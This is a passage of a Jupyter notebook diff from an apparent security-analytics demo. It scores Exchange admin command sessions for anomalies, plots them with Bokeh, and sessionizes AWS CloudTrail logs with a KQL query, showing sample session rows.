'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"DEfG329aUj8MR8bfb1pSP3V87L8x5v8+N9Fsy2iqDz/GT9MSaxukP6KEmi2evp8/xk/TEmsbpD9t4/U462MPP8ZP0xJrG6Q/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz8IcaoIJuQjP8ZP0xJrG6Q/ooSaLZ6+nz/GT9MSaxukP6KEmi2evp8/xk/TEmsbpD+ihJotnr6fP6pVKhfDwCY/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz/GT9MSaxukP8ZP0xJrG6Q/xk/TEmsbpD+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP5W5Uk+XEUc/ooSaLZ6+nz+ihJotnr6fP/tJOnBySJo+ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/YoPR+JLmuD7srItQt5mgPqKEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/lblST5cRRz+ihJotnr6fP6KEmi2evp8/lblST5cRRz+ihJotnr6fP6KEmi2evp8/lblST5cRRz/KgPnKTqiuPqKEmi2evp8/ooSaLZ6+nz+000QHIBUVP7TTRAcgFRU/tNNEByAVFT+ZGsKep5CVPoGXvoUKvDQ/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz+ihJotnr6fP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP6KEmi2evp8/SsRdKoOslz+ihJotnr6fP6pVKhfDwCY/ooSaLZ6+nz9KxF0qg6yXP8ZP0xJrG6Q/K4hu8P71IT/GT9MSaxukP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP8ZP0xJrG6Q/xk/TEmsbpD+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz8=\",\"dtype\":\"float64\",\"shape\":[127]},\"time_col\":[\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\",\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-23 01:46:21+00:00\",\"2020-05-23 04:49:40+00:00\",\"2020-05-24 02:02:29+00:00\",\"2020-05-24 04:39:22+00:00\",\"2020-05-25 02:12:22+00:00\",\"2020-05-25 04:52:01+00:00\",\"2020-05-26 02:14:37+00:00\",\"2020-05-26 04:46:11+00:00\",\"2020-05-27 01:49:10+00:00\",\"2020-05-28 02:01:50+00:00\",\"2020-05-28 05:11:20+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1742\"},\"selection_policy\":{\"id\":\"1743\"}},\"id\":\"1687\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1745\"},{\"id\":\"1746\"},{\"id\":\"1747\"},{\"id\":\"1748\"},{\"id\":\"1749\"},{\"id\":\"1750\"},{\"id\":\"1751\"},{\"id\":\"1752\"},{\"id\":\"1753\"},{\"id\":\"1754\"},{\"id\":\"1755\"},{\"id\":\"1756\"}]},\"id\":\"1705\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1694\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1662\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1715\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"1704\"},\"ticker\":null},\"id\":\"1707\",\"type\":\"Grid\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1745\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1698\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1669\",\"type\":\"BasicTicker\"},{\"attributes\":{\"source\":{\"id\":\"1687\"}},\"id\":\"1692\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1746\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1748\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1710\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1747\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1719\"},\"x_range\":{\"id\":\"1656\"},\"y_range\":null},\"id\":\"1718\",\"type\":\"RangeTool\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1719\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1690\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"1712\"}},\"id\":\"1717\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1689\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1753\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1702\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1749\",\"type\":\"DaysTicker\"}],\"root_ids\":[\"1723\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.2\"}};\n",
+       "  var render_items = [{\"docid\":\"25130edf-7ac9-4213-a127-78d1f99a8114\",\"root_ids\":[\"1723\"],\"roots\":{\"1723\":\"47580148-48b0-4fdd-9d42-43b533dc97ec\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1723"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# let's model and visualise these sessions in one go\n",
+    "\n",
+    "anomalous.score_and_visualise_sessions(\n",
+    "    data=data,\n",
+    "    session_column='param_session',\n",
+    "    window_length=3,\n",
+    "    time_column='begin',\n",
+    "    source_columns=['UserId', 'ClientIP']\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Sessionize AWS Cloud Trail Logs <a id='aws_sessions'></a>\n",
+    "\n",
+    "The cell below contains a kusto query which queries the AWSCloudTrail table in Log Analytics. In this example, we wish for the sessions to be on a per UserId - ClientIP - UserAgent - role basis. In addition, we require that each session be no longer than 20 minutes in total, with each command no more than 2 minutes apart from each other. (These requirements can be adjusted for different data-sets/use-cases etc).\n",
+    "\n",
+    "Note we choose a much shorter time_back in this KQL query. This is just because the AWS Cloud Trail logs have a lot more data when compared with the exchange admin logs for this demo tenant. We therefore choose a shorter time back purely to prevent this demo notebook from slowing down."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 35,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "query = \"\"\"\n",
+    "let time_back = 1d;\n",
+    "AWSCloudTrail\n",
+    "| where TimeGenerated >= ago(time_back)\n",
+    "//\n",
+    "// filter to the event type of interest\n",
+    "| where EventTypeName == 'AwsApiCall'\n",
+    "//\n",
+    "// optionally exclude some rows which are not suitable for your use case\n",
+    "| where UserIdentityPrincipalid != '' and SessionIssuerUserName != ''\n",
+    "//\n",
+    "// create dynamic param variable which has the EventName as the key and the RequestParameters as the values\n",
+    "| extend par = iff(RequestParameters == '', '{}', RequestParameters) \n",
+    "| extend param = todynamic(strcat('{\"', EventName, '\": ', tostring(par), '}'))\n",
+    "//\n",
+    "// rename some columns\n",
+    "| project TimeGenerated, Operation=EventName, UserId=UserIdentityPrincipalid, ClientIP=SourceIpAddress, UserAgent, role=SessionIssuerUserName, param\n",
+    "//\n",
+    "// sort by the user related columns and the timestamp column in ascending order\n",
+    "| order by UserId asc, ClientIP asc, UserAgent asc, role asc, TimeGenerated asc\n",
+    "//\n",
+    "// calculate the start time of each session into the \"begin\" variable\n",
+    "// With each session max 20 mins in length with each event at most 2 mins apart.\n",
+    "// A new session is created each time one of the user related columns change.\n",
+    "| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP) or UserAgent != prev(UserAgent) or role != prev(role))\n",
+    "//\n",
+    "// summarize the operations and the params by the user related variables and the \"begin\" variable\n",
+    "| summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation), UserAgent=any(UserAgent), role=any(role), params=makelist(param) by UserId, ClientIP, begin\n",
+    "//\n",
+    "// optionally specify an order to the final columns\n",
+    "| project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, role, UserAgent, cmds, params\n",
+    "//\n",
+    "//optionally filter out sessions which contain only one event\n",
+    "| where nCmds > 1\n",
+    "\"\"\""
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# execute the query\n",
+    "aws_df = qry_prov.exec_query(query=query)\n",
+    "# I comment out this cell and run it again once it has run to prevent the notebook from slowing down"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(2689, 11)\n"
+     ]
+    }
+   ],
+   "source": [
+    "try:\n",
+    "    print(aws_df.shape)\n",
+    "except AttributeError as e:\n",
+    "    aws_df = _kql_raw_result_.to_dataframe()\n",
+    "    print(aws_df.shape)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>nCmds</th>\n",
+       "      <th>nDistinctCmds</th>\n",
+       "      <th>begin</th>\n",
+       "      <th>end</th>\n",
+       "      <th>duration</th>\n",
+       "      <th>role</th>\n",
+       "      <th>UserAgent</th>\n",
+       "      <th>cmds</th>\n",
+       "      <th>params</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>\n",
+       "      <td>13.68.133.167</td>\n",
+       "      <td>15</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-28 04:18:17+00:00</td>\n",
+       "      <td>2020-05-28 04:18:18+00:00</td>\n",
+       "      <td>00:00:01</td>\n",
+       "      <td>Ashwin-AzSentinel</td>\n",
+       "      <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>\n",
+       "      <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>\n",
+       "      <td>[{'LookupEvents': {'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>\n",
+       "      <td>13.68.133.167</td>\n",
+       "      <td>14</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-28 04:23:23+00:00</td>\n",
+       "      <td>2020-05-28 04:23:23+00:00</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>Ashwin-AzSentinel</td>\n",
+       "      <td>aws-sdk-dotnet-45/3.3.100.7 aws-sdk-dotnet-core/3.3.100.7 .NET_Runtime/4.0 .NET_Framework/4.0 OS...</td>\n",
+       "      <td>[LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvents, LookupEvent...</td>\n",
+       "      <td>[{'LookupEvents': {'startTime': 'May 28, 2020 4:02:26 AM', 'endTime': 'May 28, 2020 4:07:26 AM'}...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>AROA3WIKNJYL5IERDHCJX:0e1059bf-bb62-449c-bca4-90871edc48b1</td>\n",
+       "      <td>40.87.53.92</td>\n",
+       "      <td>14</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2020-05-28 04:13:08+00:00</td>\n",
+       "      <td>2020-05-28 04:13:09+00:00</td>\n",
+       "      <td>00:00:01</td>\n",
+       "      <td>Ashwin-AzSentinel</td>\n",
